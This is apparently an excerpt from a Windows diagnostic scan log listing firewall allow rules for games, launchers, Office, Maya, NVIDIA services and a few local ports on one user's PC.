FirewallRules: [{757B1BF4-3E93-4F2F-A197-67C9747E7C3E}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [UDP Query User{800F6B14-FF41-4B25-9C26-E58146EEE86E}C:\program files (x86)\softnyx\gunbound\gungame.gme] => (Allow) C:\program files (x86)\softnyx\gunbound\gungame.gme
FirewallRules: [TCP Query User{E137CB7E-790E-4184-8F28-62112376F1CF}C:\program files (x86)\softnyx\gunbound\gungame.gme] => (Allow) C:\program files (x86)\softnyx\gunbound\gungame.gme
FirewallRules: [UDP Query User{CA79EB93-A466-4BF2-B942-EFDB4F300DC7}C:\program files (x86)\softnyx\gunbound\launcher.exe] => (Allow) C:\program files (x86)\softnyx\gunbound\launcher.exe
FirewallRules: [TCP Query User{3DFFEF5B-555B-4BCD-821A-A681F146A871}C:\program files (x86)\softnyx\gunbound\launcher.exe] => (Allow) C:\program files (x86)\softnyx\gunbound\launcher.exe
FirewallRules: [{7971F769-8D9C-49D9-9CA4-2E9673BB7E51}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1708.2116\gxxsvc.exe
FirewallRules: [{78B0E40E-7439-4CFF-B3AA-EDD99EFDBE5C}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7F416953-6853-4EAA-9C9A-D541B6959D5E}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{E486882A-3F95-427A-A850-8DFEA0EA77CE}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1707.0619\gxxsvc.exe
FirewallRules: [{BA7A74AF-303D-4796-8DC0-7F728E34F66D}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{01E84514-675F-43F4-BF9E-A32CBD853436}] => (Allow) C:\Users\ouroboros\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{8B87A111-231E-4074-A108-0556709E0651}] => (Allow) C:\Program Files (x86)\Bignox\BigNoxVM\RT\NoxVMHandle.exe
FirewallRules: [{909770F2-D6D9-4AA2-9764-EC9F5BFF0F34}] => (Allow) C:\Program Files (x86)\Nox\bin\Nox.exe
FirewallRules: [{FDC883D1-338C-466A-84B4-88109FFDA32B}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{76AF7528-A941-472E-A6EF-CD82A65DED0D}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{09EBE196-FCFA-4737-A3FE-6D7105D4B5A8}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{260C39BF-E014-4E13-9856-E469C6A25410}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{93B62DA2-760F-45F2-8A15-88F8C81783B0}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{F4BFDD40-95DA-4E87-B895-991D7A44200C}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{33BF9629-9E29-441D-AC3E-72B72EC05CBB}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{F0726F34-A7D6-40C6-9D25-EB50AD8C1559}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{9391C468-D775-4DE8-8B43-0564ACBA3608}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{F756EE63-FC8B-4DB9-BE6B-5A767FDEE7BD}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{DEA8B699-8EA8-469B-AF55-4DCCAFC22DA6}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{A1CAC7FA-276F-43BF-9608-69A04A886B68}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{6665C4A1-D32C-4A88-85ED-C53E5DA7635A}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{AE7417BE-77BC-4A84-9F6C-61AFEC9CDA89}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{32876558-A457-44E4-A01C-F86A02B6EA6F}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{880D9D4E-230D-47BF-9305-94E72AD0ADB2}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{14308E06-909C-4208-8120-0CF7136EBBAE}] => (Allow) D:\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{02C18A76-2D33-4EF2-A850-4208566ABF83}] => (Allow) D:\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{BC5C3A59-A8C5-4597-85B2-FF79E6761A65}] => (Allow) D:\Steam\steamapps\common\Montaro\nw.exe
FirewallRules: [{5DBD7AB2-89CE-4EDD-9566-80AFBA26D913}] => (Allow) D:\Steam\steamapps\common\Montaro\nw.exe
FirewallRules: [{23B6ED51-8756-48A9-A2FF-70958249F3F6}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{27844BEF-6FA6-4805-BD08-86BAE66045D8}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{DA762A41-B6BD-4F04-A819-06A7167954D5}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{55F92D04-A226-487A-8E00-9BE754E0F0AD}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{D51EE89F-0E50-403F-ADB8-A385E6D7EB10}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{DA2933D5-E477-46B7-89B6-D894DF70B773}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{DCD7CCA3-9C4E-4591-BBD8-E8C42F875320}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1706.2319\gxxsvc.exe
FirewallRules: [{FB3425C4-BFE5-4F90-984D-22DEA75A92C3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{A3593865-DA07-4BDE-BD0E-689CB1AB4974}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{29125B35-BF9B-4C18-8116-ED14861FCCCA}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1EFCD02B-425A-487C-8EED-30EF29101D9C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1315A5F1-35E8-46F8-A372-1B5C9D2D64E6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{731E68A1-303F-4426-9718-DB86366D52EF}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{775DA3E0-62B7-40D8-95EE-16D5D4C37D45}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Dreamweaver CC 2014\Dreamweaver.exe
FirewallRules: [UDP Query User{51A07625-BEDA-4A37-97B3-6643B65B5CBE}C:\program files\autodesk\maya2014\bin\mayabatch.exe] => (Allow) C:\program files\autodesk\maya2014\bin\mayabatch.exe
FirewallRules: [TCP Query User{B8CD7A39-DCF3-4EBB-A686-53EDBE7A341B}C:\program files\autodesk\maya2014\bin\mayabatch.exe] => (Allow) C:\program files\autodesk\maya2014\bin\mayabatch.exe
FirewallRules: [{113B921C-EA74-48C6-ACE3-BC185CC68FF7}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1706.0112\gxxsvc.exe
FirewallRules: [{D4F1C83C-D15D-4650-A3D6-7423750F200E}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1705.2300\gxxsvc.exe
FirewallRules: [{BE9595A9-9887-4BDE-B15F-7289119BDF2A}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\server.exe
FirewallRules: [{2B0768A4-103C-413A-8C3B-385CCC1C1933}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\server.exe
FirewallRules: [{D6B4C737-433C-40BA-8649-1418346AC5B2}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\manager.exe
FirewallRules: [{4FEB8A5B-8E44-4697-A62D-74BA3B57D7E8}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\manager.exe
FirewallRules: [{7B09C145-5130-4CFE-8D68-6AA341347355}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\monitor.exe
FirewallRules: [{F513367C-0055-4D7B-B4A4-F0050F545FA7}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\monitor.exe
FirewallRules: [{FAF190D2-3D8A-47DD-B1B6-3BEABC4358F0}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1705.1510\gxxsvc.exe
FirewallRules: [{03DC8E43-9735-4939-9BD3-1C21AAAD9422}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [UDP Query User{325F6A0B-6C73-40A1-B5A9-5425398086E5}D:\grand theft auto v\gta5.exe] => (Allow) D:\grand theft auto v\gta5.exe
FirewallRules: [TCP Query User{F034CC39-731E-4868-B62A-0A541C4EC905}D:\grand theft auto v\gta5.exe] => (Allow) D:\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{7FAA20A4-A6E4-4016-BE7B-24522CC31852}C:\users\ouroboros\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\ouroboros\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [TCP Query User{7876120A-77CA-4DD8-A14C-B0A18E2AA89E}C:\users\ouroboros\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\ouroboros\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{B32F8576-3523-4345-A6FD-09FF0B15CDD7}D:\garena plus\updatemanager.exe] => (Allow) D:\garena plus\updatemanager.exe
FirewallRules: [TCP Query User{90CB7603-BAA0-458E-80AF-E44F71E2EA11}D:\garena plus\updatemanager.exe] => (Allow) D:\garena plus\updatemanager.exe
FirewallRules: [{3357E87A-742C-4DE6-A018-662D02CF6468}] => (Allow) D:\Steam\steamapps\common\The Witcher 3\bin\x64\witcher3.exe
FirewallRules: [{541E4D8A-ACE6-42FB-AD30-D70FBC7471FA}] => (Allow) D:\Steam\steamapps\common\The Witcher 3\bin\x64\witcher3.exe
FirewallRules: [{608E5591-ED17-4616-BC5C-A8C0F15759F3}] => (Allow) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
FirewallRules: [{C565B510-A8E3-4D9E-9913-381477649B42}] => (Allow) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
FirewallRules: [{0937940D-FB15-49C8-AE9F-754BAD581E89}] => (Allow) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
FirewallRules: [{F0582FA5-A771-4EE0-A4CD-025F7C6E29F8}] => (Allow) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
FirewallRules: [UDP Query User{C9CD0CC8-212A-43AD-B46E-B09C141FFC9D}C:\windows\temp\files\bin\kmss.exe] => (Allow) C:\windows\temp\files\bin\kmss.exe
FirewallRules: [TCP Query User{D2B63009-9E97-4A00-8C8C-93C187075789}C:\windows\temp\files\bin\kmss.exe] => (Allow) C:\windows\temp\files\bin\kmss.exe
FirewallRules: [UDP Query User{6DD611FA-E691-4598-831F-07DC5EB805FC}D:\garena plus\bbtalk\bbtalk.exe] => (Allow) D:\garena plus\bbtalk\bbtalk.exe
FirewallRules: [TCP Query User{5D169CA9-AB9B-4A1F-8C80-A5B43B623A03}D:\garena plus\bbtalk\bbtalk.exe] => (Allow) D:\garena plus\bbtalk\bbtalk.exe
FirewallRules: [{5FFF49E6-1BE7-41D8-8569-2DF01AFD3C6A}] => (Allow) LPort=6953
FirewallRules: [{43BAE99B-E83D-493A-BF00-D12EBB8F91F0}] => (Allow) LPort=6953
FirewallRules: [{7FCC8BBA-4EA9-476C-9187-0A0DE4340956}] => (Allow) LPort=6941
FirewallRules: [{8854E2CA-097D-4E03-99F3-DFA013BDB854}] => (Allow) LPort=6941
FirewallRules: [{94A577A7-D029-41DA-9E92-C0450CC923FD}] => (Allow) LPort=6896
FirewallRules: [{2C950BE0-409A-43F4-8FEE-DDECD718FDED}] => (Allow) LPort=6896
FirewallRules: [{4747EEAC-FD54-4B81-AD6F-2259CD75F6C1}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{6500A046-533C-4C54-B71F-2558D0CF3458}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{065F80C8-AB08-4784-9E70-8E20B708B835}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{F6B3A1F6-397C-464B-BFB5-BBDD88CCA9E3}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{38E0492B-2C83-48D6-9850-6C800A082CB4}] => (Allow) LPort=8370
FirewallRules: [{503C95E0-D8C5-45EC-8DE3-CCAFFE867B11}] => (Allow) LPort=8370
FirewallRules: [{7149536F-61E4-41EB-B370-F94F996A2C10}] => (Allow) D:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{F0A3FF89-C692-477A-8B67-6B3343DF83BA}] => (Allow) D:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{F79BAABB-C45D-4A0A-A7EA-704CF93EB55C}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{AB009857-1720-4F0B-B2CD-BCB4BD2BDD35}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [UDP Query User{15C6C466-3C24-4AE3-9DA7-F9C7FF365986}D:\garena plus\bbtalk\bbtalk.exe] => (Allow) D:\garena plus\bbtalk\bbtalk.exe
FirewallRules: [TCP Query User{93D18ECC-4402-4945-9778-2E0E683A095E}D:\garena plus\bbtalk\bbtalk.exe] => (Allow) D:\garena plus\bbtalk\bbtalk.exe
FirewallRules: [{C2638AA3-CCA4-43FD-967C-43FB9D48CB53}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{862E82FA-FC0E-4839-8EC6-8BCCC5718878}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{2CBFE814-CFB1-45C1-9314-4C6E2279C6AA}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{A554E6E4-6F52-433F-9249-9DE7FF14D9BC}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{697AE15A-955D-4179-A81A-CC0EE0A7D7D4}] => (Allow) LPort=8370
FirewallRules: [{7804A345-3F36-402A-93AB-6E2484B976A1}] => (Allow) LPort=8370
FirewallRules: [UDP Query User{4489F0AC-501A-46A6-9370-404174FBCBA1}D:\garena plus\garenamessenger.exe] => (Allow) D:\garena plus\garenamessenger.exe
FirewallRules: [TCP Query User{6FEE892A-E089-4724-9CDC-D4BEFE8EEE64}D:\garena plus\garenamessenger.exe] => (Allow) D:\garena plus\garenamessenger.exe
FirewallRules: [{927F1B6C-E5F4-4596-AFA9-B98FC4819403}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{79F3CA2E-8EFA-4DA4-B296-EA3BA19050C9}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{56401C5F-519E-4BBE-88B0-107DC3875B01}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{E3996533-10A6-4737-8CB4-20AE967DB3BA}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{1D788C5B-F185-4DDD-8FCD-1D2451733740}] => (Allow) C:\WINDOWS\SysWOW64\ftp.exe
FirewallRules: [{E539E2FB-D8DA-4EDD-9B78-FDDC0A3DD357}] => (Allow) C:\WINDOWS\SysWOW64\ftp.exe
FirewallRules: [{90B67AD3-A675-46BD-9CD9-7A923B82AA47}] => (Allow) C:\WINDOWS\system32\ftp.exe
FirewallRules: [{E43ADB07-910A-41DC-8349-2B71AB6C8EEE}] => (Allow) C:\WINDOWS\system32\ftp.exe
FirewallRules: [{B3FE2AF6-4F32-4BC7-91BA-B30BF4776D8C}] => (Allow) D:\garena plus\garenamessenger.exe
FirewallRules: [{D18C7D5F-DEC8-4EDD-A44C-5EFF2B98076B}] => (Allow) D:\garena plus\garenamessenger.exe
FirewallRules: [{3E030108-8FB2-42C7-9334-E07DC64E0B0D}] => (Allow) C:\Program Files\Autodesk\Maya2014\bin\maya.exe
FirewallRules: [{307B5C5F-5FDD-4264-883F-7518CCFCD731}] => (Allow) C:\Program Files\Autodesk\Maya2014\bin\maya.exe
FirewallRules: [{DDB485FC-C59A-4AF8-B097-6A616E49999D}] => (Allow) C:\Program Files\Autodesk\Maya2014\bin\maya.exe
FirewallRules: [{C6F72EAA-3003-4C29-A297-77A8F42EEBC7}] => (Allow) C:\Program Files\Autodesk\Maya2014\bin\maya.exe
FirewallRules: [TCP Query User{B5E6B107-EB49-4A20-8763-FD204B275989}D:\nba 2k17\nba2k17.exe] => (Allow) D:\nba 2k17\nba2k17.exe
FirewallRules: [UDP Query User{5BD72A11-9275-471C-82CB-2E7DFCED77FF}D:\nba 2k17\nba2k17.exe] => (Allow) D:\nba 2k17\nba2k17.exe
FirewallRules: [TCP Query User{087BC06E-1A12-4D65-B764-4EEE6A11B936}D:\mortal kombat xl\binaries\retail\mk10.exe] => (Allow) D:\mortal kombat xl\binaries\retail\mk10.exe
FirewallRules: [UDP Query User{800600F4-99D7-43AD-840D-5D4A96E7058D}D:\mortal kombat xl\binaries\retail\mk10.exe] => (Allow) D:\mortal kombat xl\binaries\retail\mk10.exe
FirewallRules: [{C0BA3FAB-88F8-4D6C-A142-0DDD6E7BD4A5}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{0C0058E4-9909-49CC-94DD-79684A3D159B}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{FB5322FF-C84A-4E54-8190-C152E8C30134}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{4DB5FAC9-A635-4852-AAFE-F3E2FDC67DC9}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{25C58122-C0B9-43F7-9E0E-F854CDAFC6DC}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{B81F780D-2C5E-462F-9675-214224C5F487}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [TCP Query User{84455F40-63A8-4BA2-969B-F3CB34C560FA}D:\steam\steamapps\common\hatred\hatred\binaries\win64\hatred-win64-shipping.exe] => (Allow) D:\steam\steamapps\common\hatred\hatred\binaries\win64\hatred-win64-shipping.exe
FirewallRules: [UDP Query User{D87F26CB-F0C5-4B44-B11D-8751DE4DFB83}D:\steam\steamapps\common\hatred\hatred\binaries\win64\hatred-win64-shipping.exe] => (Allow) D:\steam\steamapps\common\hatred\hatred\binaries\win64\hatred-win64-shipping.exe
FirewallRules: [{8C60E014-5BA1-4232-A9F7-5A42D6E33520}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{F2A73D26-7D41-49F4-A9B1-4F0A2058C9CE}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{076ED648-FE11-45AE-B83C-701B9BC0EAF8}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{71A4475F-D81E-4274-9383-C0272980E477}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{6B9206C2-AD51-4D99-8815-5B89006B0BE9}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{D3B39784-D1F2-4729-8F88-0F60B3578ACB}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7E5816D5-72A7-4469-A5D0-EF17FAE54A70}] => (Allow) D:\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{F264A0B8-8C5E-4017-88B9-2E12DA472B9B}] => (Allow) D:\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{C741A11E-137C-4D9B-BC7C-021DEA2758D5}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{222928A5-DD53-4E28-9A2A-F9A13AD6B67B}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{94DF1BCD-AF32-41EC-A022-7DD369F6EF9F}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{89907266-F45C-4FC0-953F-9825D86E168A}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{692CEA2A-BB9C-4DE3-B4FA-08B0DEB238D8}] => (Allow) D:\GarenaLoLPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{6AEE019D-152E-451D-8914-9BE1CF2F341D}] => (Allow) D:\GarenaLoLPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{9D34750C-DCAD-42C5-B921-A8535058BF6D}] => (Allow) D:\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{15B43387-22C7-4368-9560-73871E113B96}] => (Allow) D:\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{8B07649C-80A8-4C44-B349-1A586ECB1EDB}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1703.1720\gxxsvc.exe
FirewallRules: [{F11EF63E-505F-481D-9405-12CCD0A813B7}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{B819D63D-4E17-44AE-8747-BC79A6A98C7A}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{A9E70FF9-BD1B-4DD5-8FE6-627EF2590C36}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{F81C4E27-C86F-421E-9FB5-918740CF990F}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{6B37EC85-38ED-4000-A7BC-FB516AC9BBB5}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{E82DC81F-B962-424E-8C46-F98552721F04}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{07DB9EDC-7B1C-4D36-83AE-D5016632C647}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{C3718472-91E0-416C-AC9D-CA4204C0E4DF}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{C579EB47-2156-4857-9E2F-492A6C8CB5E0}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{5B62D0F5-DCA7-4754-A550-9E2FFE9B9BAF}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{3390EC79-3916-4EB1-8BBE-D20C7A321A1A}] => (Allow) D:\Ableton\Program\Ableton Live 9 Suite.exe
FirewallRules: [{E4D2110F-B355-47A6-B200-816AA578D94B}] => (Allow) D:\Ableton\Program\Ableton Live 9 Suite.exe
FirewallRules: [{2EEE8FC2-9E28-47F4-939F-461F511E42F1}] => (Allow) D:\Ableton\Program\Ableton Live 9 Suite.exe
FirewallRules: [{A0FD1C53-A1B9-4391-8713-6A431D0832D2}] => (Allow) D:\Ableton\Program\Ableton Live 9 Suite.exe
FirewallRules: [{72EAC743-83FC-4473-B7B7-B62FC9C5FDD4}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{730CEC08-DD0D-4D86-9B7E-E5EB9B7497E6}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{1255066D-ED2C-409B-96F9-59B83D62C686}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{DD795B58-5FB7-40BC-B50D-EA6ED4F3B950}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{41895A07-18E0-47F4-BAEB-3EEC60CFAAE5}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{7F050CA6-5EEC-42A5-8653-80E13BD9A856}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{15C38A1D-1158-4485-B7C6-B6E6E04A240E}] => (Allow) D:\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{5C5B2D6A-626C-4AC8-BF3F-AAA46E82FFA4}] => (Allow) D:\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{05E42D2F-A64D-4CE7-B53C-4C61DE29421F}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{AD31C9C1-9F35-4696-A697-627B4165ECAE}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{DEB1916B-3837-4824-B93A-D20D4CB67555}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{88021022-AE0D-417D-8008-55D09A1B1B77}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{26F129BC-EF6E-41D7-892B-4A2378D8F34D}] => (Allow) D:\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{C692CCAE-EDC9-427F-B259-FFD92B7D72CB}] => (Allow) D:\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{E47AB6B3-8E01-4E9B-B0AC-FF8AF9B565CF}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{D16727D3-BCF4-4838-A82D-E57B87C38005}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{6BF6D327-3A16-45F4-AFF9-398D234D7862}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{25B528C3-73E4-4C75-83E2-0E59958689BC}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1704.0418\gxxsvc.exe
FirewallRules: [{B45F4195-0BC8-41CF-BCCB-89571FE63606}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{D94CA53D-6E3E-47F3-97F4-BBF900254FC1}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{FA7F7987-EE3C-4FA3-A413-AD5429793835}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{9553B895-FCAA-44AA-9AA1-CD9AF90EB0C8}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{3F3279FC-202A-4B75-A15B-9441285336B2}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1704.1819\gxxsvc.exe
FirewallRules: [TCP Query User{0A79DDB8-EB20-4841-B545-FF6CFE562206}C:\users\ouroboros\appdata\local\programs\blackboard\blackboard collaborate launcher\resources\java\jre1.7.0_80\bin\javaw.exe] => (Allow) C:\users\ouroboros\appdata\local\programs\blackboard\blackboard collaborate launcher\resources\java\jre1.7.0_80\bin\javaw.exe
FirewallRules: [UDP Query User{0597DFE3-2022-494E-A071-8D55DF1331AF}C:\users\ouroboros\appdata\local\programs\blackboard\blackboard collaborate launcher\resources\java\jre1.7.0_80\bin\javaw.exe] => (Allow) C:\users\ouroboros\appdata\local\programs\blackboard\blackboard collaborate launcher\resources\java\jre1.7.0_80\bin\javaw.exe
FirewallRules: [{0890A195-51FC-48DE-82C7-E4AEE1F1E22B}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1704.2712\gxxsvc.exe
FirewallRules: [{D5848F30-8989-4ED0-A862-D217CC76E64C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{84F794CA-B5E7-4DAB-8F87-837B60806A26}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{51C3E426-0F37-4DCD-87E4-A53E652DCD2C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
